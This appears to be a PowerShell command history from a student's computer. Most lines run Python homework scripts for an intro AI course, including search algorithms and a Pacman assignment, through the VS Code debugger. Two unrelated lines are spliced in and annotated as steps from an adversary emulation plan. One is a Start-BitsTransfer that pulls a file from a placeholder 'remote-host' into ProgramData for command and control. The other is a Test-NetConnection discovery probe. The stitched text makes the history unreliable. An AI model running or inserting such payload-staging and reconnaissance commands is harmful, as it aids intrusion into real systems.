ls
python
ls
python3 .\driver.py
python3
python3 .\driver.py
clear
python3 .\driver.py
 & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '64360' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\search_algorithms.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '53575' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\search_algorithms.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '53582' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\search_algorithms.py' 
ls
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '53589' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\search_algorithms.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '55280' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\search_algorithms.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '59812' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\.vscode\launch.json' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '65184' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\.vscode\launch.json' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '64253' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\.vscode\launch.json' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '52889' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\.vscode\launch.json' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '62990' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\.vscode\launch.json' 
python -m deubgpy ./driver.py
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '59881' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\driver.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '55704' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\search_algorithms.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '61548' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\search_algorithms.py' 
python
 & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '60376' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\search_algorithms.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '63085' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\driver.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '52929' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\driver.py' 
python .\driver.py
python
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '57501' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\driver.py' 
python
python .\driver.py
python
python .\driver.py
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '61548' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\search_algorithms.py' 
e
python .\driver.py
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '64800' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\driver.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '59452' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\driver.py' 
python .\driver.py
python
python .\driver.py
python
python .\driver.py
python3 .\driver.py
ls
cd .\hw1_codes\
ls
python .\driver.py
Start-BitsTransfer -Source "http://remote-host/TWUEGJDITXAONVPUOWFV" -Destination "c:\ProgramData\temp\TWUEGJDITXAONVPUOWFV" // menu_pass/Emulation_Plan/yaml/menupass.yaml#L10 # Scenario 1, Step 2 - Command and Control
 & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '50123' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\driver.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '50138' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\driver.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '50146' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\driver.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI'; & 'C:\Users\jgwak\AppData\Local\Programs\Python\Python39\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '50155' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\driver.py' 
 & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '49889' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\hw1_codes\driver.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\hw1_codes'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '63669' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\hw1_codes\driver.py' 
python
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\hw1_codes'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '63669' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\hw1_codes\driver.py' 
ls
python3 .\driver.py
python3 .\driver.py > result
 & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '60451' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\hw1_codes\driver.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\hw1_codes'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1191016588\pythonFiles\lib\python\debugpy\launcher' '52253' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\hw1_codes\driver.py' 
python .\driver.py > result.txt
python .\driver.py
python .\driver.py > result.txt
ls
python
python3
python
 & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '64399' '--' 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback\feedbacker.py' 
 & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '62259' '--' 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback\feedbacker.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '51315' '--' 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback\feedbacker.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '49952' '--' 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback\feedbacker.py' 
python3
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '49804' '--' 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback\feedbacker.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '49810' '--' 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback\feedbacker.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '64268' '--' 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback\feedbacker.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '51282' '--' 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback\feedbacker.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '59694' '--' 'c:\Users\jgwak\OneDrive\Desktop\cs240_TA_관련\feedback\feedbacker.py' 
exit()
Test-NetConnection "192.0.2.10" // https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/4a57b3dd5d28ad1bd79e927e04b20fd4d66934a0/menu_pass/Emulation_Plan/yaml/menupass.yaml#L90 // # Scenario 1, Step 3: Discovery
ls
l
s
ls
python .\feedbacker.py
ls
python .\pacman.py
python2 pacman.py
python3 .\pacman.py
python3 .\pacman.py -h
python .\pacman.py
py -2 pacman.py
python3
python
python2
python
python3
python2
py -2
py -3
py -2
python2
ls
py -2 pacman.py --layout testMaze --pacman GowestAgent
python pacman.py --layout testMaze --pacman GoWestAgent
py -2 pacman.py --layout testMaze --pacman GoWestAgent
py -2 pacman.py --layout tinyMaze --pacman GoWestAgent
 & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '56354' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search\pacman.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Users\jgwak\AppData\Local\Microsoft\WindowsApps\python3.9.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '55870' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search\.vscode\launch.json' 'runserver' '8000' '--noreload' '--nothreading' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '55953' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search\pacman.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '57220' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search\pacman.py' 
py -2 pacman.py -h
py -2 pacman.py -l tinyMaze -p SearchAgent -a fn=tinyMazeSearch
py -2 .\pacman.py -l tinyMaze -p SearchAgent -a fn=tinyMazeSearch
py -2 pacman.py -l tinyMaze -p SearchAgent -a fn=DepthFirstSearch
py -2 pacman.py -l tinyMaze -p SearchAgent -a fn=depthFirstSearch
 & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '59539' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search\.vscode\launch.json' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '51930' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search\pacman.py' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '54936' '--' 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search\.vscode\launch.json' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '54946' '--' '${workingFolder}/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '54962' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '54962' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch'  c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '54972' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '54887' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '54896' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '52076' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '59712' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '54896' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l'
py -2 .\search.py
py -2 pacman.py --layout tinyMaze --pacman SearchAgent -a fn=depthFirstSearch
py -2 pacman.py -l tinyMaze -p SearchAgent -a fn=tinyMazeSearch
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '55262' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '55854' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '64076' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '52437' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '59668' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
py -2 pacman.py --layout tinyMaze --pacman SearchAgent -a fn=depthFirstSearch
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '50613' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
py -2 pacman.py --layout tinyMaze --pacman SearchAgent -a fn=depthFirstSearch
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '54244' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '59569' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '51669' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '51677' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '51684' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '53202' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '53209' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
 c:; cd 'c:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search'; & 'C:\Python27\python.exe' 'c:\Users\jgwak\.vscode\extensions\ms-python.python-2021.9.1230869389\pythonFiles\lib\python\debugpy\launcher' '53215' '--' 'C:\Users\jgwak\OneDrive\Desktop\Intro_to_AI\Programming_Assignments\P1\search/pacman.py' '-l' 'tinyMaze' '-p' 'SearchAgent' '-a' 'fn=depthFirstSearch' 
